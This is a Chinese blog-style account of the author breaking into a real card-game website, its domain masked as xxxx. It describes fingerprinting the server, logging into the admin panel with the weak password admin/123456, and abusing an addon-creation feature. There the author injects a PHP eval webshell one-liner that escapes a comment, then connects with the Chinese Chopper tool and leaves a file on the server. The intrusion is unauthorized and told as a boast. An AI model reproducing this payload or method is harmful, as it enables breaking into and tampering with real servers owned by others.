陪妹子玩游戏引起的风波

起因

十月一回家和表弟还有他女票在一起玩的时候(当然,还有我女票也一起,别问我女票哪来的),四个人刚好可以凑一桌麻将,表弟的女朋友说叫我们一起打黑桃4,黑桃4是我们家乡的一种打法。。。。
然后发了我一个app,我安装以后打开一看。
陪妹子玩游戏引起的风波
卧槽,XXXX四个打字出现在我眼前
不过此时心思并不在游戏上,这个叫XXXX的肯定有个官网吧。(事情到此结束,十月一回家电脑没带回去…..)
祖国的生日结束以后…..又回到了学校,打开百度搜了下这个xxxx,找到了他官网: http://xxxx.com/

踩点

简单的搜集了下信息如下:
IP: XXX.XXX.XX.XX
旁站:无
cdn:无
脚本:php
中间件:nginx
框架:ThinkPHP
cms:vlcms

可以判断出服务器架构是:php+mysql+nginx+linux

进后台

说到这个后台嘛…….很蛋疼,想说点啥,太丢人了,还是不说了吧!!!(知道了cms,先百度网上公开的漏洞,这里毛都没有……)
在url后面加上admin.php,会跳转到登录界面
陪妹子玩游戏引起的风波
测试了下弱口令(人品爆发)
admin admin 失败
admin 123456 成功
陪妹子玩游戏引起的风波

Getshell

老规矩,知道cms先百度,一样,毛都没……
只能硬着头皮在后台翻了…..
这里admin用户权限已经是属于超级管理员了,权限是最高的了。
还有个数据库备份和用户配置
陪妹子玩游戏引起的风波
不过数据库是mysql的…..没屌用啊,此处感慨为啥不学学南方。
剩下的就是上传点了
上传点有点多,随便找了个上传点
陪妹子玩游戏引起的风波
陪妹子玩游戏引起的风波
先上传张正常的图片看下上传功能是否有用
陪妹子玩游戏引起的风波
看来是能正常上传的,然后直接上传php脚本,弹了个框框(以为是js验证,禁用js后还是没用)
陪妹子玩游戏引起的风波
然后各种上传绕过都试了,也是没用。

高潮

看来上传这条路是死了,翻了翻超级管理员的访问授权,看下还有哪些功能
陪妹子玩游戏引起的风波
扩展管理?后台并没有找到这个地方,莫非是阉割版???(后来土豆找到了这个地方)
陪妹子玩游戏引起的风波
修改url为http://xxxx.com/admin.php?s=/Addons/index,然后访问
陪妹子玩游戏引起的风波
和土豆研究了下这个插件,先点击快速创建
陪妹子玩游戏引起的风波
点击预览按钮可以看到代码。。。。。
陪妹子玩游戏引起的风波
竟然能看到代码?这不是脱裤子找日吗?
思路:打算在这里写入一句话。
陪妹子玩游戏引起的风波
顺手写了个一句话,然后点击预览发现被注释了。
陪妹子玩游戏引起的风波
看来是有用的,那就好办了,闭合下注释和php末端。
最后的代码是*/?> <?php @eval($_POST[“a”]);?> <?php /
陪妹子玩游戏引起的风波
Ok,这样我们的一句话就写进去了。然后点击确定
陪妹子玩游戏引起的风波
卧槽,好激动。。。
陪妹子玩游戏引起的风波
可是tm的地址呢???不过可以肯定的是,马是写进去了。
然后我又创建了一个插件,这次不打算完整闭合代码。
陪妹子玩游戏引起的风波
这样肯定是出错的,然后我们点击确定
陪妹子玩游戏引起的风波
没错,正如你所见,报错了。刚才创建的名叫test1。
然后构造下我们之前创建名为Example的路径
地址为: http://xxxx.com/Addons/Example/ExampleAddon.class.php
然后请出菜刀,连接看看
陪妹子玩游戏引起的风波
连接成功,成功获取shell。
由于服务器Linux服务器我就不去提权了。

结尾

这种棋牌网站,竟然来了,怎么能不留点东西呢
丢个txt文件走人
陪妹子玩游戏引起的风波
陪妹子玩游戏引起的风波

-------------本文结束感谢您的阅读-------------